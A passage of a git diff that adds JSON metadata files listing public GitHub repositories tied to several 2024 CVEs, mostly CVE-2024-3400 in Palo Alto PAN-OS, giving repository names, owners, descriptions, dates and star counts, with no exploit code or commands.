+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33722.json b/2024/CVE-2024-33722.json
new file mode 100644
index 0000000000..ab3803bb42
--- /dev/null
+++ b/2024/CVE-2024-33722.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 790393442,
+ "name": "soplanning-1.52-exploits",
+ "full_name": "fuzzlove\/soplanning-1.52-exploits",
+ "owner": {
+ "login": "fuzzlove",
+ "id": 44779781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4",
+ "html_url": "https:\/\/github.com\/fuzzlove"
+ },
+ "html_url": "https:\/\/github.com\/fuzzlove\/soplanning-1.52-exploits",
+ "description": "SOPlanning 1.52.00 CSRF\/SQLi\/XSS (CVE-2024-33722, CVE-2024-33724)",
+ "fork": false,
+ "created_at": "2024-04-22T19:51:18Z",
+ "updated_at": "2024-05-07T14:23:34Z",
+ "pushed_at": "2024-05-07T14:23:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33775.json b/2024/CVE-2024-33775.json
new file mode 100644
index 0000000000..513ee8ba97
--- /dev/null
+++ b/2024/CVE-2024-33775.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 794619582,
+ "name": "CVE-2024-33775",
+ "full_name": "Neo-XeD\/CVE-2024-33775",
+ "owner": {
+ "login": "Neo-XeD",
+ "id": 168660736,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168660736?v=4",
+ "html_url": "https:\/\/github.com\/Neo-XeD"
+ },
+ "html_url": "https:\/\/github.com\/Neo-XeD\/CVE-2024-33775",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-01T15:46:32Z",
+ "updated_at": "2024-05-01T16:42:27Z",
+ "pushed_at": "2024-05-01T16:38:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33883.json b/2024/CVE-2024-33883.json
new file mode 100644
index 0000000000..7f4e5eb7df
--- /dev/null
+++ b/2024/CVE-2024-33883.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 820074511,
+ "name": "PoC-CVE-2024-33883",
+ "full_name": "Grantzile\/PoC-CVE-2024-33883",
+ "owner": {
+ "login": "Grantzile",
+ "id": 88519798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88519798?v=4",
+ "html_url": "https:\/\/github.com\/Grantzile"
+ },
+ "html_url": "https:\/\/github.com\/Grantzile\/PoC-CVE-2024-33883",
+ "description": "PoC of CVE-2024-33883, RCE vulnerability of ejs.",
+ "fork": false,
+ "created_at": "2024-06-25T18:40:31Z",
+ "updated_at": "2024-06-25T19:09:32Z",
+ "pushed_at": "2024-06-25T18:42:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ejs",
+ "rce-exploit",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-33911.json b/2024/CVE-2024-33911.json
new file mode 100644
index 0000000000..d37784aa6d
--- /dev/null
+++ b/2024/CVE-2024-33911.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796239614,
+ "name": "CVE-2024-33911",
+ "full_name": "xbz0n\/CVE-2024-33911",
+ "owner": {
+ "login": "xbz0n",
+ "id": 40547674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4",
+ "html_url": "https:\/\/github.com\/xbz0n"
+ },
+ "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-33911",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T11:14:47Z",
+ "updated_at": "2024-05-20T09:31:52Z",
+ "pushed_at": "2024-05-05T11:23:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3400.json b/2024/CVE-2024-3400.json
new file mode 100644
index 0000000000..ed0af7316e
--- /dev/null
+++ b/2024/CVE-2024-3400.json
@@ -0,0 +1,1067 @@
+[
+ {
+ "id": 785991655,
+ "name": "CVE-2024-3400",
+ "full_name": "Yuvvi01\/CVE-2024-3400",
+ "owner": {
+ "login": "Yuvvi01",
+ "id": 70095030,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70095030?v=4",
+ "html_url": "https:\/\/github.com\/Yuvvi01"
+ },
+ "html_url": "https:\/\/github.com\/Yuvvi01\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T05:16:21Z",
+ "updated_at": "2024-05-20T10:41:38Z",
+ "pushed_at": "2024-04-13T05:20:15Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786090468,
+ "name": "CVE-2024-3400-PoC",
+ "full_name": "CerTusHack\/CVE-2024-3400-PoC",
+ "owner": {
+ "login": "CerTusHack",
+ "id": 92284780,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92284780?v=4",
+ "html_url": "https:\/\/github.com\/CerTusHack"
+ },
+ "html_url": "https:\/\/github.com\/CerTusHack\/CVE-2024-3400-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T11:55:53Z",
+ "updated_at": "2024-04-20T15:20:03Z",
+ "pushed_at": "2024-04-13T20:51:29Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 786123425,
+ "name": "CVE-2024-3400",
+ "full_name": "0x0d3ad\/CVE-2024-3400",
+ "owner": {
+ "login": "0x0d3ad",
+ "id": 18898977,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4",
+ "html_url": "https:\/\/github.com\/0x0d3ad"
+ },
+ "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2024-3400",
+ "description": "CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-13T14:00:31Z",
+ "updated_at": "2024-06-15T01:28:40Z",
+ "pushed_at": "2024-04-18T07:11:17Z",
+ "stargazers_count": 49,
+ "watchers_count": 49,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 49,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 786201656,
+ "name": "CVE-2024-3400",
+ "full_name": "FoxyProxys\/CVE-2024-3400",
+ "owner": {
+ "login": "FoxyProxys",
+ "id": 166161106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4",
+ "html_url": "https:\/\/github.com\/FoxyProxys"
+ },
+ "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:14:47Z",
+ "updated_at": "2024-04-16T13:04:58Z",
+ "pushed_at": "2024-04-16T13:04:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786473067,
+ "name": "CVE-2024-3400",
+ "full_name": "momika233\/CVE-2024-3400",
+ "owner": {
+ "login": "momika233",
+ "id": 56291820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4",
+ "html_url": "https:\/\/github.com\/momika233"
+ },
+ "html_url": "https:\/\/github.com\/momika233\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T15:16:16Z",
+ "updated_at": "2024-05-17T06:47:57Z",
+ "pushed_at": "2024-04-14T15:20:34Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 786540183,
+ "name": "CVE-2024-3400",
+ "full_name": "MrR0b0t19\/CVE-2024-3400",
+ "owner": {
+ "login": "MrR0b0t19",
+ "id": 63489501,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4",
+ "html_url": "https:\/\/github.com\/MrR0b0t19"
+ },
+ "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2024-3400",
+ "description": "Vulnerabilidad de palo alto ",
+ "fork": false,
+ "created_at": "2024-04-14T19:11:16Z",
+ "updated_at": "2024-04-15T20:17:12Z",
+ "pushed_at": "2024-04-14T19:23:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786651484,
+ "name": "CVE-2024-3400-Compromise-Checker",
+ "full_name": "MurrayR0123\/CVE-2024-3400-Compromise-Checker",
+ "owner": {
+ "login": "MurrayR0123",
+ "id": 98131196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98131196?v=4",
+ "html_url": "https:\/\/github.com\/MurrayR0123"
+ },
+ "html_url": "https:\/\/github.com\/MurrayR0123\/CVE-2024-3400-Compromise-Checker",
+ "description": "A simple bash script to check for evidence of compromise related to CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-15T03:28:22Z",
+ "updated_at": "2024-04-26T06:02:36Z",
+ "pushed_at": "2024-04-26T06:02:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 787153640,
+ "name": "CVE-2024-3400",
+ "full_name": "AdaniKamal\/CVE-2024-3400",
+ "owner": {
+ "login": "AdaniKamal",
+ "id": 44063862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44063862?v=4",
+ "html_url": "https:\/\/github.com\/AdaniKamal"
+ },
+ "html_url": "https:\/\/github.com\/AdaniKamal\/CVE-2024-3400",
+ "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect",
+ "fork": false,
+ "created_at": "2024-04-16T01:43:24Z",
+ "updated_at": "2024-05-21T11:39:48Z",
+ "pushed_at": "2024-04-16T02:08:47Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787259719,
+ "name": "CVE-2024-3400-",
+ "full_name": "LoanVitor\/CVE-2024-3400-",
+ "owner": {
+ "login": "LoanVitor",
+ "id": 100142681,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100142681?v=4",
+ "html_url": "https:\/\/github.com\/LoanVitor"
+ },
+ "html_url": "https:\/\/github.com\/LoanVitor\/CVE-2024-3400-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-16T07:31:22Z",
+ "updated_at": "2024-04-16T17:18:12Z",
+ "pushed_at": "2024-04-16T07:41:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 787437309,
+ "name": "CVE-2024-3400",
+ "full_name": "h4x0r-dz\/CVE-2024-3400",
+ "owner": {
+ "login": "h4x0r-dz",
+ "id": 26070859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4",
+ "html_url": "https:\/\/github.com\/h4x0r-dz"
+ },
+ "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400",
+ "description": "CVE-2024-3400 Palo Alto OS Command Injection",
+ "fork": false,
+ "created_at": "2024-04-16T14:18:08Z",
+ "updated_at": "2024-06-21T00:12:19Z",
+ "pushed_at": "2024-04-16T22:35:43Z",
+ "stargazers_count": 139,
+ "watchers_count": 139,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 139,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787493956,
+ "name": "CVE-2024-3400-RCE-Scan",
+ "full_name": "W01fh4cker\/CVE-2024-3400-RCE-Scan",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-3400-RCE-Scan",
+ "description": "CVE-2024-3400-RCE",
+ "fork": false,
+ "created_at": "2024-04-16T16:18:56Z",
+ "updated_at": "2024-06-12T17:45:09Z",
+ "pushed_at": "2024-04-22T08:50:27Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 787515205,
+ "name": "CVE-2024-3400-POC",
+ "full_name": "CONDITIONBLACK\/CVE-2024-3400-POC",
+ "owner": {
+ "login": "CONDITIONBLACK",
+ "id": 6516181,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516181?v=4",
+ "html_url": "https:\/\/github.com\/CONDITIONBLACK"
+ },
+ "html_url": "https:\/\/github.com\/CONDITIONBLACK\/CVE-2024-3400-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-16T17:08:15Z",
+ "updated_at": "2024-04-16T22:03:41Z",
+ "pushed_at": "2024-04-16T17:18:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 787613969,
+ "name": "CVE-2024-3400",
+ "full_name": "Chocapikk\/CVE-2024-3400",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-16T21:21:41Z",
+ "updated_at": "2024-05-21T22:38:02Z",
+ "pushed_at": "2024-04-17T21:04:22Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787614808,
+ "name": "CVE-2024-3400",
+ "full_name": "ihebski\/CVE-2024-3400",
+ "owner": {
+ "login": "ihebski",
+ "id": 13177580,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13177580?v=4",
+ "html_url": "https:\/\/github.com\/ihebski"
+ },
+ "html_url": "https:\/\/github.com\/ihebski\/CVE-2024-3400",
+ "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect",
+ "fork": false,
+ "created_at": "2024-04-16T21:24:15Z",
+ "updated_at": "2024-06-08T15:29:04Z",
+ "pushed_at": "2024-04-17T11:03:32Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 787738421,
+ "name": "CVE-2024-3400-Checker",
+ "full_name": "index2014\/CVE-2024-3400-Checker",
+ "owner": {
+ "login": "index2014",
+ "id": 44129868,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44129868?v=4",
+ "html_url": "https:\/\/github.com\/index2014"
+ },
+ "html_url": "https:\/\/github.com\/index2014\/CVE-2024-3400-Checker",
+ "description": "A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability. Palo Alto 防火墙 PAN-OS 远程命令注入检测程序。",
+ "fork": false,
+ "created_at": "2024-04-17T04:58:42Z",
+ "updated_at": "2024-04-17T05:56:31Z",
+ "pushed_at": "2024-04-17T05:57:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787894337,
+ "name": "CVE-2024-3400-Canary",
+ "full_name": "ZephrFish\/CVE-2024-3400-Canary",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-3400-Canary",
+ "description": "Have we not learnt from HoneyPoC?",
+ "fork": false,
+ "created_at": "2024-04-17T11:41:01Z",
+ "updated_at": "2024-06-10T05:08:26Z",
+ "pushed_at": "2024-04-17T12:04:33Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 788013743,
+ "name": "CVE-2024-3400",
+ "full_name": "ak1t4\/CVE-2024-3400",
+ "owner": {
+ "login": "ak1t4",
+ "id": 10950567,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10950567?v=4",
+ "html_url": "https:\/\/github.com\/ak1t4"
+ },
+ "html_url": "https:\/\/github.com\/ak1t4\/CVE-2024-3400",
+ "description": "Global Protec Palo Alto File Write Exploit",
+ "fork": false,
+ "created_at": "2024-04-17T16:01:20Z",
+ "updated_at": "2024-05-31T15:01:46Z",
+ "pushed_at": "2024-04-17T19:46:15Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788136951,
+ "name": "cve-2024-3400-poc",
+ "full_name": "phantomradar\/cve-2024-3400-poc",
+ "owner": {
+ "login": "phantomradar",
+ "id": 151703345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151703345?v=4",
+ "html_url": "https:\/\/github.com\/phantomradar"
+ },
+ "html_url": "https:\/\/github.com\/phantomradar\/cve-2024-3400-poc",
+ "description": "Simple POC for CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-17T21:03:39Z",
+ "updated_at": "2024-04-17T21:06:09Z",
+ "pushed_at": "2024-04-17T21:06:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788161583,
+ "name": "CVE-2024-3400",
+ "full_name": "retkoussa\/CVE-2024-3400",
+ "owner": {
+ "login": "retkoussa",
+ "id": 128074431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128074431?v=4",
+ "html_url": "https:\/\/github.com\/retkoussa"
+ },
+ "html_url": "https:\/\/github.com\/retkoussa\/CVE-2024-3400",
+ "description": "CVE-2024-3400 : Palo Alto OS Command Injection - POC",
+ "fork": false,
+ "created_at": "2024-04-17T22:28:10Z",
+ "updated_at": "2024-04-21T03:04:20Z",
+ "pushed_at": "2024-04-17T23:46:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788388835,
+ "name": "CVE-2024-3400",
+ "full_name": "schooldropout1337\/CVE-2024-3400",
+ "owner": {
+ "login": "schooldropout1337",
+ "id": 134079876,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134079876?v=4",
+ "html_url": "https:\/\/github.com\/schooldropout1337"
+ },
+ "html_url": "https:\/\/github.com\/schooldropout1337\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-18T10:16:22Z",
+ "updated_at": "2024-05-27T00:48:05Z",
+ "pushed_at": "2024-04-22T05:06:51Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788514206,
+ "name": "CVE-2024-3400",
+ "full_name": "hahasagined\/CVE-2024-3400",
+ "owner": {
+ "login": "hahasagined",
+ "id": 3049408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3049408?v=4",
+ "html_url": "https:\/\/github.com\/hahasagined"
+ },
+ "html_url": "https:\/\/github.com\/hahasagined\/CVE-2024-3400",
+ "description": "EDL for IPs attacking customers with CVE-2024-3400 ",
+ "fork": false,
+ "created_at": "2024-04-18T15:06:03Z",
+ "updated_at": "2024-04-18T15:06:03Z",
+ "pushed_at": "2024-04-18T15:13:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788553953,
+ "name": "CVE-2024-3400",
+ "full_name": "codeblueprint\/CVE-2024-3400",
+ "owner": {
+ "login": "codeblueprint",
+ "id": 212233,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/212233?v=4",
+ "html_url": "https:\/\/github.com\/codeblueprint"
+ },
+ "html_url": "https:\/\/github.com\/codeblueprint\/CVE-2024-3400",
+ "description": "Simple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-18T16:35:29Z",
+ "updated_at": "2024-04-18T20:15:20Z",
+ "pushed_at": "2024-04-19T12:14:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788558935,
+ "name": "CVE-2024-3400",
+ "full_name": "swaybs\/CVE-2024-3400",
+ "owner": {
+ "login": "swaybs",
+ "id": 37590406,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37590406?v=4",
+ "html_url": "https:\/\/github.com\/swaybs"
+ },
+ "html_url": "https:\/\/github.com\/swaybs\/CVE-2024-3400",
+ "description": "Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts",
+ "fork": false,
+ "created_at": "2024-04-18T16:45:51Z",
+ "updated_at": "2024-04-19T12:23:40Z",
+ "pushed_at": "2024-04-18T18:06:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-3400",
+ "palo-alto",
+ "palo-alto-firewalls",
+ "palo-alto-networks",
+ "paloaltonetworks",
+ "python",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788665827,
+ "name": "CVE-2024-3400-Check",
+ "full_name": "sxyrxyy\/CVE-2024-3400-Check",
+ "owner": {
+ "login": "sxyrxyy",
+ "id": 125439203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4",
+ "html_url": "https:\/\/github.com\/sxyrxyy"
+ },
+ "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-3400-Check",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-18T21:12:49Z",
+ "updated_at": "2024-04-18T21:13:17Z",
+ "pushed_at": "2024-04-18T22:56:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788666276,
+ "name": "CVE-2024-3400",
+ "full_name": "Ravaan21\/CVE-2024-3400",
+ "owner": {
+ "login": "Ravaan21",
+ "id": 48627542,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48627542?v=4",
+ "html_url": "https:\/\/github.com\/Ravaan21"
+ },
+ "html_url": "https:\/\/github.com\/Ravaan21\/CVE-2024-3400",
+ "description": "CVE-2024-3400 POC written in Rust and Python",
+ "fork": false,
+ "created_at": "2024-04-18T21:14:15Z",
+ "updated_at": "2024-04-18T21:16:31Z",
+ "pushed_at": "2024-04-18T21:21:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788820989,
+ "name": "CVE-2024-3400",
+ "full_name": "pwnj0hn\/CVE-2024-3400",
+ "owner": {
+ "login": "pwnj0hn",
+ "id": 29369899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29369899?v=4",
+ "html_url": "https:\/\/github.com\/pwnj0hn"
+ },
+ "html_url": "https:\/\/github.com\/pwnj0hn\/CVE-2024-3400",
+ "description": "Finding Palo Alto devices vulnerable to CVE-2024-3400.",
+ "fork": false,
+ "created_at": "2024-04-19T06:37:32Z",
+ "updated_at": "2024-04-19T06:38:46Z",
+ "pushed_at": "2024-04-19T06:39:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
